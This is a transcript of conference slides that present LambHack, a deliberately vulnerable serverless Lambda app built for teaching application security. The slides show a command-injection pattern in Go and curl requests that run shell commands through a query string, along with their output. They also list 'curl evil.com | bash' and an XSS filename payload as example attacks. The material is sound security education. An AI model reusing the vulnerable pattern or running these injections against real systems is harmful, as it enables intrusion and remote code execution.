LambHack: A Vulnerable Serverless Application
-
Upload
james-wickett -
Category
Software
-
view
76 -
download
0
Transcript of LambHack: A Vulnerable Serverless Application
![Page 1: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/1.jpg)
CLOUD AUSTIN @WICKETT
LAMBHACK: A VULNERABLE
SERVERLESS APPLICATION
JAMES WICKETT
![Page 2: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/2.jpg)
CLOUD AUSTIN @WICKETT
Development of highly-resilient, distributed systems is now
easier than ever with serverless, however application security is
more important than ever before.
WHY IT MATTERS
![Page 3: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/3.jpg)
CLOUD AUSTIN @WICKETT
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
![Page 4: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/4.jpg)
CLOUD AUSTIN @WICKETT
Serverless encourages functions as deploy units and run as one-time*, read-only containers*, coupled with
third party services that allow running end-to-end applications without
worrying about system operation.
SERVERLESS DEFINITION
* - there is container reuse and writability
![Page 5: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/5.jpg)
CLOUD AUSTIN @WICKETT
VMsHardware Serverless
Inspiration from @adrianco
Waste
Value
![Page 6: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/6.jpg)
CLOUD AUSTIN @WICKETT
![Page 7: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/7.jpg)
CLOUD AUSTIN @WICKETT
http://martinfowler.com/articles/serverless.html
API GATEWAY
![Page 8: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/8.jpg)
CLOUD AUSTIN @WICKETT
CI/CD auth
wordpress scraper
event ingestion chatbots
load testing
MORE SERVERLESS USE CASES
![Page 9: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/9.jpg)
CLOUD AUSTIN @WICKETT
Security
![Page 10: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/10.jpg)
CLOUD AUSTIN @WICKETT
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF SERVERLESS SECURITY
![Page 11: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/11.jpg)
CLOUD AUSTIN @WICKETT
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
![Page 12: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/12.jpg)
CLOUD AUSTIN @WICKETThttps://medium.com/
@PaulDJohnston/security-and-serverless-ec52817385c4
![Page 13: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/13.jpg)
CLOUD AUSTIN @WICKETT
INSPIRED BY WEB GOAT AND ALL THE OTHER
GOATS…
![Page 14: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/14.jpg)
CLOUD AUSTIN @WICKETT
![Page 15: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/15.jpg)
CLOUD AUSTIN @WICKETT
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
![Page 16: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/16.jpg)
CLOUD AUSTIN @WICKETT
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lamback
![Page 17: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/17.jpg)
CLOUD AUSTIN @WICKETT
![Page 18: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/18.jpg)
CLOUD AUSTIN @WICKETT
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA
![Page 19: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/19.jpg)
CLOUD AUSTIN @WICKETT
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS,
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
![Page 20: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/20.jpg)
CLOUD AUSTIN @WICKETT
lambhack is a vulnerable serverless lambda application
It would certainly be a bad idea to base any coding patterns off
what you see here.
![Page 21: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/21.jpg)
CLOUD AUSTIN @WICKETT
![Page 22: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/22.jpg)
CLOUD AUSTIN @WICKETT
WHY IS THIS BAD?
command := lambdaEvent.QueryParams[“args"]
output := runner.Run(command)
![Page 23: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/23.jpg)
CLOUD AUSTIN @WICKETT
With command execution available to us in
lambhack, we can poke around the container a bit
![Page 24: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/24.jpg)
CLOUD AUSTIN @WICKETT
UNAME -A
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
![Page 25: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/25.jpg)
CLOUD AUSTIN @WICKETT
CAT /PROC/VERSION$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1”
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
![Page 26: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/26.jpg)
CLOUD AUSTIN @WICKETT
LET’S LOOK IN /TMP
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
![Page 27: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/27.jpg)
CLOUD AUSTIN @WICKETT
LAMBDA REUSE IN ACTION!
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1”
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
![Page 28: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/28.jpg)
CLOUD AUSTIN @WICKETT
WHICH CURL
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
![Page 29: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/29.jpg)
CLOUD AUSTIN @WICKETT
GOT PROXY?$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1" > "<!doctype html>\n<html>\n<head>\n <title>Example Domain</title>\n\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n <style type=\"text/css\">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 50px;\n background-color: #fff;\n border-radius: 1em;\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n body {\n background-color: #fff;\n }\n div {\n width: auto;\n margin: 0 auto;\n border-radius: 0;\n padding: 1em;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is established to be used for illustrative examples in documents. You may use this\n domain in examples without prior coordination or asking for permission.</p>\n <p><a href=\"http://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\n"
bit.ly/lh-demo1
![Page 30: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/30.jpg)
CLOUD AUSTIN @WICKETT
‣ HELP NEEDED
‣ ADD XSS AND OTHER ATTACKS
‣ ADD AUTH VECTORS AND EXAMPLES
‣ NEEDS A UI PLEASE!
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
![Page 31: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/31.jpg)
CLOUD AUSTIN @WICKETT
APPLICATION SECURITY IS STILL RELEVANT 15+
YEARS LATER
![Page 32: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/32.jpg)
CLOUD AUSTIN @WICKETT
![Page 33: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/33.jpg)
CLOUD AUSTIN @WICKETT
‣ New surface area, similar appsec problems
‣ Command Exec, XSS, Injection Attacks
‣ All the OWASP Top Ten
‣ What is old is new.
‣ Appending ‘curl evil.com | bash’
‣ Add <script>alert(1)</script> to a filename you upload on s3
TYPES OF ATTACKS
![Page 34: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/34.jpg)
CLOUD AUSTIN @WICKETT
Development of highly-resilient, distributed systems is now
easier than ever with serverless, however application security is
more important than ever before.
WHY IT MATTERS
![Page 35: LambHack: A Vulnerable Serverless Application](https://reader030.fdocuments.in/reader030/viewer/2022011722/5a6479147f8b9a31568b46af/html5/thumbnails/35.jpg)
CLOUD AUSTIN @WICKETT
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to [email protected]